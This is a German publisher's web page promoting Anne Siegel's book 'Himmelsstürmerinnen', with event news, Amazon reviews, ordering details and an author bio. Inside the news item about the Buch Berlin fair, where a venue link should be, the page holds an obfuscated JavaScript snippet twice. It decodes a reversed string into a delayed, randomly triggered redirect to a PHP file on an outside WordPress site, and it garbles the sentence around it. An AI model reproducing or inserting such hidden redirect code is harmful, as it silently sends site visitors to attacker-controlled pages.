Himmelsstürmerinnen

Anne Siegel

Aktuelles   Rezensionen   Leseprobe

Himmelsstürmerinnen sind Frauen, die etwas riskieren und einem inneren Ruf folgen. Sie sind anspruchsvoll, dabei aber nur selten gefällig. Furchtlos stellen sie sich in unseren Medien der Öffentlichkeit und schwimmen auch bei Gegenströmung weiter. Wer sind diese Frauen? Ist Wahrhaftigkeit ihr Geheimnis? Was haben sie für Ziele? Eine literarische Annäherung an Magazinmacherinnen, Weltreisende, Frauenretterinnen, Sich-Neu-Erfinderinnen, Wüstenwesen, waghalsige Turmspringerinnen und vermeintliche Diven. Mit Porträts über Tanja de Wendt, Monika Hauser, Katarzyna Mol-Wolf, Meike Winnemuth, Désirée von Trotha, Carolin Genreith, Alice Schwarzer, Elisa Klapheck, Anke Domscheit-Berg, Maren Kroymann …

Aktuelles

Münchner Bücherschau

Gestern Abend war die Eröffnung der Münchner Bücherschau. Auch CINDIGO stellt dort 10 Bücher aus. Neben unseren Kriminalromanen, auch die Sachbücher und unseren erzählerischen Bildband. Ab heute 20.11.2014 steht die Bücherschau allen interessierten offen.

CINDIGO in der Abendschau RBB

Die RBB Abendschau hat über die 1. Buch Berlin berichtet. Auch das Buch  ‚John Lennon & May Pang‘ wurde erwähnt. Bei ca. 2:00!

Hier geht es zum RBB Beitrag.

Buch Berlin erster Tag

Nach dem erfolgreichen ersten Tag der Buch-Berlin, geht es heute in die zweite Runde. Das Highlight sind heute die Lesungen von Anne Siegel, sie liest um 16:20 aus Frauen Fische Fjorde und Katja D. Schreiber, sie liest um 17:00 ihre Kurzgeschichte ‚der Wolf‘ aus der Anthologie Manhattan crime.

1. Buch Berlin

Besuchen Sie uns auf der 1. Buch Berlin. Wir stellen unser gesamtes Verlagsprogramm aus und freuen uns auf interessierte Besucher!

Die Buch Berlin findet am 15. und 16. November 2014 im Audimax der $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andorte/campus-treskowallee/“ target=“_blank“>»$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andorte/campus-treskowallee/“ target=“_blank“>Hochschule für Technik und Wirtschaft (HTW) statt. Das Hochschulgelände befindet sich direkt gegenüber der Tram-Haltestelle „Treskowallee/HTW“ (3 Minuten vom S-Bahnhof Karlshorst) sowie nur 10 Minuten Fußweg vom U-Bahnhof Tierpark entfernt.

Vorschau Herbst 2014

Herbst 2014

Gerade ist sie fertig geworden, unsere Verlagsvorschau für den Herbst 2014. Die schönste Vorschau die wir je hatten … aber das sagen wir irgendwie bei jeder Vorschau.

Unser Spitzentitel ist ein erzählerischer Bildband über John Lennon & May Pang, begleitet von einem zweiten Bildband Notizen aus der Sahara von Désirée von Trotha.

Aber auch die anderen Novitäten können sich sehen lassen: Unsere New-York Anthologie Manhattan tender findet eine Fortsetzung in Manhattan crime und das Ermittler-Trio unseres Kriminalromans Glycinienmord bekommt in der Hopfenkönigin erneut alle Hände voll zu tun.

Auch freuen wir uns auf NordBräute dem Roman zum literarischen Sachbuch Frauen Fische Fjorde von Anne Siegel.

Ihre Verleger Nicole & Philip Joens

Himmelsstürmerinnen in der Redezeit WDR5 25.01.2014 um 11:00 Uhr

Frauen in die Wüste – eine wüste Zeit für Frauen?

Am Samstag, den 25. Januar stellt Anne Siegel während der halbstündigen REDEZEIT im WDR 5 (kurz nach 11 bis halb 12) ihr neues Buch HIMMELSSTÜRMERINNEN vor. Zehn Portraits erfolgreicher Frauen, die den Sprung in die Medien wählten und zum Teil satten Gegenwind bekamen.

Redezeit mit Anne Siegel: zum Nachhören bei WDR5

Monika Hauser · Meike Winnemuth · Tanja de Wendt · Anke Domscheit-Berg · Katarzyna Mol-Wolf · Désirée von Trotha · Carolin Genreith · Elisa Klapheck · Maren Kroymann · Alice Schwarzer

Rezensionen

4 Sterne von Jury bei Amazon

Himmelsstürmerinnen: „Himmelsstürmerinnen“ wurde geschrieben, „um Frauen zu inspirieren“ – auch, wie die Verlegerin betont, um neue Wege heraus aus der anachronistischen Fixierung auf Neid und Wettbewerb zu zeigen. Im vorliegenden Band geht es um Medien-Frauen, geplant sind weitere Bücher über Frauen in Justiz und Medizin.

Die Journalistin Anne Siegel portraitiert zu diesem Zweck 10 Frauen:  [expand title=“… mehr“ swaptitle=“… weniger“]

– die Stuntfrau und Schauspielerin Tanja de Wendt
– die Gynäkologin Monika Hauser, die ein Hilfwerk für vergewaltigte Frauen errichtet hat
– die Zeitschriften-Verlegerin Katarzyna Mol-Wolf
– Meike Winnemuth, Journalistin, die eine halbe Million gewann und die Welt bereiste
– die Regisseurin Désirée von Trotha, die das halbe Leben bei Sahara-Nomaden verbringt
– Carolin Genreith, der wir den Dokumentarfilm Die mit dem Bauch tanzen“ verdanken
– „Emma“ Alice Schwarzer, militante und wirtschaftlich höchst erfolgreiche Feministin
– Elisa Klapheck, die erst fünfte Rabbinerin weltweit
– die „Piraten“-Politikerin Anke Domscheit-Berg
– die Entertainerin Maren Kroymann

Im Eifer des Gefechts verliert man leicht den klaren Blick. Anne Siegel gelingt es in vielen Beiträgen, ihre kämpferische Einstellung nicht störend in den Text fließen zu lassen. Das ist gut so – denn genau in überzogener Polarisierung liegt eine wesentliche Quelle von Unzufriedenheit, gerade bei Frauen, denen eingeflüstert wurde, dass es an ihrem Geschlecht läge, wenn nicht alles wie von selbst läuft.

Der Rezensent ist weißhäutig, intelligent, deutschstämmig, heterosexuell, alt und männlich. Langjährige Erfahrung damit, keine gesellschaftliche Lobby hinter sich zu wissen, liegt also vor. Oft ist es aber auch einfach ein gutes Gefühl, bei Erfolgen sicher sein zu können, dass man diese ganz gewiss nicht einer Quote oder einer mehr oder weniger verfehlten „Politischen Korrektheit“ verdankt.

Allerdings wird man auch so langsam allergisch gegen die Grabenkämpfe von Lobbyisten aller Art, die für „ihre“ Clientel gewöhnlich bei weitem mehr „rauszuholen“ versuchen, als ihr nach Adam Riese zustehen sollte.

Maß und Ziel sind zunehmend angesagt. Gesellschaftlich hätte eine sachlichere und seriösere Kämpferin für Gleichberechtigung womöglich mehr bewirkt als eine häufig überziehende, sogar hetzerische und oft bis zur Peinlichkeit polemische Alice Schwarzer. Ob es eine gute Wahl war, ausgerechnet Frau Schwarzer zur Zeit ihres großen Steuer-Skandals den größten Raum in diesem Buch zu widmen, wage ich zu bezweifeln. Aber vermutlich war die Autorin gerade dadurch motiviert, das angeschlagene Image ihrer langjährigen Freundin aufpolieren zu können.

Andere Viten lesen sich hingegen durchaus spannend. Mich hat die Idee einer mentalen Körperlichkeit bei Tanja de Wendt fasziniert. Ich war beeindruckt von dem gewaltigen Apparat, den Monika Hauser zur Unterstützung vergewaltigter Frauen aufbauen konnte. Die Risikobereitschaft der „emotion“-Verlegerin Mol-Wolf, sich in diesen für Print-Medien nicht gerade leichten Zeiten kopfüber in ein solches Projekt zu stürzen, lässt mich immer noch fassungslos staunen.

Meine persönliche Sympathie gilt allerdings Meike Winnemuth, die nach ihrem Jauch-Gewinn mit einer originellen Weltreise so viel Persönlichkeit bewiesen hat und heute die Konsequenz aufbringt, auf der „optionsreduzierenden“ Insel Spiekeroog zu leben. Zudem gebe ich neidvoll zu: Diese Frau versteht es wirklich, unterhaltsam und klug zu schreiben.

Unter dem Strich bin ich zuversichtlich, dass die meisten Leser unter den 10 Lebensskizzen einige finden werden, die ihnen Freude bereiten. Dennoch hätte man meiner Ansicht nach besser daran getan, auf Polarisierung zu verzichten. „Inspiration“ und Kampf gegen die Hälfte der Menschheit passen nicht zusammen. Wirklich große Leistungen kommen immer aus dem Interesse an der Sache und nie aus verkrampften Siegeswillen. Warum also nicht über der Sache stehen und sich nicht auf Frauen beschränken?

Ein zweiter Vorschlag wäre, zumindest einige Artikel auch MenschInnen – man verzeihe mir die kleine Stichelei – zu widmen, bei deren Karriere der Begriff „Himmelsstürmer“ nicht zu diskutieren wäre. Es gibt doch auch in der besseren Hälfte der Bevölkerung einige, die nur den Arm ausstrecken brauchen, um Gott zu fühlen…

Ich denke da nicht mal an die angeblich mächtigste Frau der Welt – sondern an die tatsächlich mächtigste Frau Deutschlands, deren atemberaubender Lebensweg von einer Telefonistin zum gefürchteten Medienmogul geführt hat.

Ich denke an die großartige Sängerin, lange Zeit in Köln zuhause, die sich aus einer Prügelehe befreit hat und in unbändigem Lebenswillen zu grandiosem Welterfolg und – wenn es stimmt, was man liest – persönlichem Glück gefunden hat; völlig ohne Hilfe irgendwelcher AktivistInnen.

Ich denke nicht zuletzt auch an die große Choreografin, die es vollbracht hat, aus einer finsteren Ruhrpott-Provinzbühne DIE Hochburg moderner Tanzkultur zu zaubern.

Etwas mehr Offenheit und eine größere Bandbreite – das ist es, was ich mir gewünscht hätte.

Gefallen hat mir das umfangreiche Personen-Register am Ende des Buchs. Als Meilenstein unter Büchern dieser Art muss man aber wohl eher die „Begegnungen“ von Gero von Böhm loben. Da könnten wohl nicht nur weibliche Autoren noch menschlich, stilistisch und journalistisch ein wenig dazulernen. Beiden Büchern gemein ist leider jedoch das unverständliche Defizit, auf Abbildungen der interviewten Damen und Herren zu verzichten.

Ansonsten liefern – soweit ich das als Mann beurteilen kann – die „Himmelsstürmerinnen“ vermutlich schon speziell feministischen Frauen die „Inspiration“, die sie sich von diesem Buch erhoffen. Auf diese Zielgruppe bezieht sich auch die abschließende Gesamtwertung. Die eingangs erwähnte, von Konfrontation wegführende Ausrichtung könnte wohl eher von Autoren umgesetzt werden, die selbst über der Geschlechterfrage stehen. [/expand]

5 Sterne von Isabel Fiedler bei Amazon

Himmelsstürmerinnen: Sehr informatives und unterhaltsames Buch über 10 verschiedene Frauen in der Medienwelt.

Anne Siegel pflegt einen flotten Schreibstil, der ihre Sachbücher so spannend macht, das man sie in einem Rutsch durchliest.

Die einzelnen Kapitel machen so neugierig auf die beschriebenen Himmelsstürmerinnen, das ich sofort noch mehr von/über einige dieser wissen wollte und mir weitere Bücher bestellt habe. [expand title=“… mehr“ swaptitle=“… weniger“]

Kann das Buch nur jedem ans Herz legen, man entwickelt schnell eine große Leidenschaft für die Protagonistinnen. [/expand]

4 Sterne von M. Lambrecht bei Amazon

Himmelsstürmerinnen: Das lesen dieses Buches hat mir sehr viel Freude bereitet. Zehn Beispiele von Frauen, allesamt mit großer Medienerfahrung, die herausragendes in ihrem Leben leisten. Nur zwei Frauen kannte ich bereits vor dem lesen dieses Buches.
Die Geschichten der einzelnen Frauen lesen sich allesamt sehr gut. Ich hatte das Gefühl dabei zu sein. Der Autorin ist es gelungen, mein Interesse für die einzelnen Personen zu entwickeln. Mittlerweile habe ich begonnen über alle Personen weiter nachzulesen.  [expand title=“… mehr“ swaptitle=“… weniger“]

Mit einer Begeisterung die ansteckend ist beschreibt Anne Siegel jede Frau.
Schade fand ich, dass keine Fotos der Frauen dabei waren. Zumindestens ein Bild von jeder Frau fände ich absolut erforderlich. So musste ich erst im Internet recherchieren um mir die Personen vorstellen zu können. Für mich hätte es ruhig nur fünf Personen sein dürfen, und eine längere Berichterstattung. Schade fand ich, dass bei der Ärztin Monika Hauser keine Adressen, Kontaktdaten über Ihre Organisation angefügt waren. Auch das ihre Ehrungen aus Platzgründen nicht aufgelistet wurden hat mir nicht gefallen. Herausragende Menschen verdienen, dass Ihnen Platz geschaffen wird.

Ich bin froh, das Buch gelesen zu habe. Ich fand es sehr inspirierend und Bereichernd. Der Schreibstil der Autorin ist mitreißend und teilweise sehr humorvoll. [/expand]

Schicken Sie uns eine Rezension

Gerne veröffentlichen wir Rezensionen unserer Leser und Leserinnen. Wenn Sie eine Rezension veröffentlichen wollen, schicken Sie ihre Meinung zu einem unserer Bücher an info [at] cindigo [dot] de

Himmelsstürmerinnen

Laden Sie das PressKit für die Himmelsstürmerinnen und Anne Siegel hier. Es enthält Cover & Autoren-Bilder in hoher Auflösung, sowie Bio und Pressetexte.

 

Kaufen

Himmelsstürmerinnen €12,95

13,5 x 21cm, 288 Seiten
Klappenbroschur
ISBN: 978-3-944251-11-0

Himmelsstürmerinnen direkt beim Verlag bestellen und dadurch die unabhängigen Verlage unterstützen!

Oder Sie unterstützen mit dem Kauf eine Buchhandlung Ihres Vertrauens. Jede Buchhandlung kann dieses Buch für den nächsten Tag beschaffen.

Sie lesen Ihre Bücher lieber als eBook? Kein Problem, hier geht es direkt zu einigen ausgesuchten Anbietern:

Apple, Amazon, Hugendubel, Buecher.de, Thalia, eBook.de

Autorin

Autorin Himmelsstürmerinnen

Anne Siegel wurde in Norddeutschland geboren und wuchs dort auf dem Land auf.

Nach dem Studium der Volkswirtschaft, Sozialwissenschaften und Psychologie lebte und arbeitete sie in England, Israel und in den Niederlanden, war Dozentin, Werbetexterin, Ghostwriterin für Politiker und Kabarettisten.

Sie war ausserdem Comedy-Autorin fürs deutsche Fernsehen.

Heute lebt sie in San Francisco und Köln und arbeitet als Journalistin und Hörspielautorin für öffentlich-rechtliche Sender in Deutschland, sowie als Drehbuchautorin und Dokumentarfilmerin für US-Produktionen.

Leseprobe Himmelsstürmerinnen




Dieses Buch können Sie über jede
Buchhandlung beziehen oder direkt
über den Verlags-Shop:
http://shop.cindigofilm.de

Himmelstürmerinnen
Anne Siegel
288 Seiten, Klappenbroschur
ISBN: 9783944251110
  • Zoom
  • Slide Show
  • Show All Pages
  • Fullscreen